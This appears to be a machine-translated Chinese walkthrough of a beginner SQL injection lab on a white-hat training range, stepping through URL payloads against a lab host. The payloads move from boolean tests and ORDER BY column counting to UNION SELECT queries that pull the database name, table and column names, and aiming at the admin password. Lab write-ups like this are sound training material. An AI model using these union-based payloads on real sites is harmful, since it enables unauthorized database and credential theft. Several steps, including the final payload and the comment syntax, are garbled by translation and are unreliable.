射击场地址:风神台-控安全在线攻防训练场,专为网络安全专业人士打造的白帽黑客渗透测试训练平台。 (zkaq.cn)
点击查看新闻1,获取以下信息
输入负载:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=1 — –
将显示该页面。注射可能已经成功。请再测试一下。
输入负载:http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 — –
此时页面上没有任何内容输入。我们可以得出结论,SQL注入是一种简单的数字类型。
然后拖动库
首先,使用order by 查找从1 开始的列数。从1 开始到错误之前的数字将告诉您表中有多少列。
输入payload:http://pu2lh35s.ia.aqlab.cn/?id=1 order by 1 —如果输入3
请输入负载: Payload: http://pu2lh35s.ia.aqlab.cn/?id=1 Order by 3 — –
确保列数为2
然后使用union和select的组合来确定输出内容将放在哪一列。
请输入负载:http://pu2lh35s.ia.aqlab.cn/?id=1 Union select 1,2 LIMIT 1,1 — –
一旦检查完毕,就很容易首先获取数据库名称。
请输入负载:http://pu2lh35s.ia.aqlab.cn/?id=1 Union select 1,database() LIMIT 1,1 — –
输入负载:http://pu2lh35s.ia.aqlab.cn/?id=1 Union select 1,group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA=\’maoshe\’ LIMIT 1,1 — –
group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA=\’maoshe\’ 如果你不明白这个语句的意思,请询问ai。
输入负载:http://pu2lh35s.ia.aqlab.cn/?id=1 Union select 1,group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME=\’admin\’ and TABLE_SCHEMA=\’maoshe\’ LIMIT 1,1 — –
请输入您的有效负载:
http://pu2lh35s.ia.aqlab.cn/?id=1 联盟选择1,密码不受管理员限制1,1 — –
提交
以上#靶场实战——SQL注入(一级)相关内容摘自网络,仅供大家参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93868.html
